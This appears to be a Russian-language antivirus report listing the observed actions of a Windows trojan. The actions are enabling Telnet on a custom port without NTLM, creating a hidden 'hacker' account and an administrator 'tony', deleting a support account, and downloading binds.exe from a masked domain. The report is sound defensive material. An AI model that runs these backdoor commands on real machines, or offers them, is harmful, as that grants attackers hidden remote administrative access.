Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\calssc.exe (загружен из сети Интернет)
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-NTLM
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\ftp.exe -s:TAR_BZ.TXT
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v hacker /t REG_DWORD /d 00000000
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen "%TEMP%\33.jpg"
- <SYSTEM32>\net1.exe localgroup Администраторы tony /add
- <SYSTEM32>\net1.exe user tony stark /add
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\binds[1].exe
- <SYSTEM32>\calssc.exe
- %TEMP%\2820S21U.bat
- %TEMP%\sh.exe
- %TEMP%\33.jpg
- %TEMP%\2820S21U.bat
- %TEMP%\2820S21U.bat
- 'fl###nia.com':80
- fl###nia.com/binds.exe
- DNS ASK fl###nia.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''